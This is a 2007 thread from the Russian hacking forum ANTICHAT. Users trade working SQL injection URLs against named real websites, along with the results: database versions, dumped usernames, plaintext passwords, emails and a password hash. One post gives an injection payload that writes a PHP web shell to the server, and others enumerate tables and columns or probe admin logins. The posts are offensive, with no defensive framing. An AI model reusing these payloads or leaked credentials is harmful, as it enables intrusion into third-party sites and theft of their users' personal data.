ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.12.2007, 15:26
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Сообщение от Tigger
Плиззз...ответьте на мой вопрос.
Я взломл сайт тимощука....http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,user,14,15,16,17,18,19,20,pass,22,23,24,25,2 6+from+users/* там лежат пароли и логин...но админку найте не могу...и можете сказать где админка и к чему могут подходить эти проли?
login:Usama
hash пароля:dcddb75469b4b4875094e14561e573d8
пароль:00000
Можешь залить шелл через инжекцию и узнать где админка.
----------------------------------------------------------
ankor.ru
Код HTML:
http://www.ankor.ru/cityDescr.php3?uid=60&cid=17+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
USER:ankor@pm29.zenon.net
VERSION:4.0.27-log
DATABASE:ankor
Последний раз редактировалось trumps; 21.12.2007 в 15:33..
|
|
|
21.12.2007, 16:09
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от trumps
Можешь залить шелл через инжекцию и узнать где админка.
Скажи пожалуйста как шелл залить?
|
|
|
|
21.12.2007, 16:21
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.trizland.ru/task.php?id=-11+union+select+1,2,3,4,concat_ws(0x2F,cast(versio n()+as+binary),cast(database()+as+binary),cast(use r()+as+binary)),6,7,8,9/*
4.1.18/bin17www/bin17www-sql@way.hc.ru
-----------------------------------------------------------------------------
all-news.ru
http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7/*
5.0.45-log/u15215_2/u15215@10.10.10.205
http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,username,password, contact_email,contact_icq),3,4,5,6,7+from+u15215.z p_partners/*
логин/пароль/мейл/уин
runet/261072/wmcash@pochta.ws/
http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,login,password,ema il,authkey),3,4,5,6,7+from+u15215.users/*
логин/пароль/мейл/код авторизации
BaDGiRL/1791179/BadGiRL@mail.ru/
|
|
|
|
21.12.2007, 16:50
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Сообщение от Tigger
Скажи пожалуйста как шелл залить?
Код HTML:
http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>'+,4,5from+user+into+outfile+'/home/site/html/shell.php'/*
Такой запрос создаст шелл в директории "/home/site/html/"
----------------------------------------
cavs.msstate.edu
Код HTML:
http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4/*
USER:webdata@Infoserv.HPC.MsState.Edu
VERSION:5.0.24a-standard
DATABASE:webdata
Таблицы -
Код HTML:
http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Table_name),4+from+information_schema.tables/*
Колонны -
Код HTML:
http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Column_name),4+from+information_schema.columns/*
|
|
|
|
21.12.2007, 20:47
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Код:
http://www.odin-torg.com/catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_n ame,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14 +from+information_schema.columns+where+column_name +like+0x257061737325+limit+0,1/*&cat=
5 мускул,есть 3 бд с паролями админов,сайт сам фигня,но интересно другое а именно CMSка 
p.s ни один пароль к админке не подходит,кто найдет акк с доступом тому от меня плюсики  |
|
|
|
21.12.2007, 21:31
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
www.twinind.com
Код:
http://twinind.com/catalog_detail.php?id=-274+union+select+1,2,3,4,5,6,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),8,9,10,11,12,13/*
4.1.14: root@localhost:catalog
www.kelleykreations.com
Код:
http://www.kelleykreations.com/catalog/catalog.php?id=-70+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*
4.0.27-standard:kelleykr_storeus@localhost:kelleyk
www.truelifetaxidermy.com
Код:
http://www.truelifetaxidermy.com/catalog.php?id=-16+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4/*
4.1.14-standard-log:user1161039@64.224.109.41:truelifetaxidermycom
www.upeda.org
Код:
http://www.upeda.org/view.php?id=-73+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*
4.1.22-community-nt:upeda@dsiis:upeda
www.ipodpalace.com
Код:
http://www.ipodpalace.com/view.php?ID=-125+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14/*
4.1.22-standard:ipodpala_ipod@localhost:ipodpala_news
Последний раз редактировалось 5taY3r; 21.12.2007 в 23:07..
|
|
|
|
22.12.2007, 02:05
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022
Репутация:
259
|
|
Код:
http://adam.fulara.com/e.php?g=gallery&nr=-33+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4/*
fulara@localhost::fulara::4.0.12-standard
Есть табличка users, но никаких колонок не смог подобрать...
Код:
http://www.umka.dp.ua/price.php?g=-7+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9/*
umapalata@localhost::umapalata::5.0.27-log
Здесь всё очень удобно выводится))
users->login,passwords,email
довольно много интересных мыл, есть админские от разных сайтов) |
|
|
|
22.12.2007, 12:49
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от fobofob
Код:
http://www.odin-torg.com/catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_n ame,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14 +from+information_schema.columns+where+column_name +like+0x257061737325+limit+0,1/*&cat=
5 мускул,есть 3 бд с паролями админов,сайт сам фигня,но интересно другое а именно CMSка
p.s ни один пароль к админке не подходит,кто найдет акк с доступом тому от меня плюсики там двойная авторизация
Код:
http://odin-torg.com/admin/
, если вводить admin:admin попадаем на
Код:
http://odin-torg.com/admin/general_admin/start.php
а там данные от u60555_odin.general_admin, но проверка ip . и кавычка экранируется =\
Код:
'SELECT id FROM general_admin WHERE login = 'логин' AND pass = 'пасс\'/*' AND ip_address = 'твой ip' не может быть выполнена.
|
|
|
|
22.12.2007, 13:41
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
pechatnick.com
http://news.pechatnick.com/index.phtml?id=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*
5.0.45-log/u8421_2/u8421@10.10.223.234
http://news.pechatnick.com/index.phtml?id=-1+union+select+concat_ws(0x2F,login,pass,email,icq )+from+users+limit+3000,1/*
логин/пароль/мейл/уин больше 3000 юзеров
chaxter/881515/2v@bk.ru/
|
|
|
|
22.12.2007, 20:46
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022
Репутация:
259
|
|
Код:
http://www.wollrus.ru/catalog/zzz.php?b=4&tip=-2+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8,9/*
wollrus9@localhost::wollrus9_shvey::4.1.22-log
Ничё не нашёл.
Код:
http://www.wegcode.be/wetgrp.php?g=-1+union+select+1,2,3,concat_ws(char(58,58),user(),database(),version()),5,6/*
wegcode_main@localhost::wegcode_main::4.0.23-standard
Есть таблица admin, но там нашёл только id и name... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
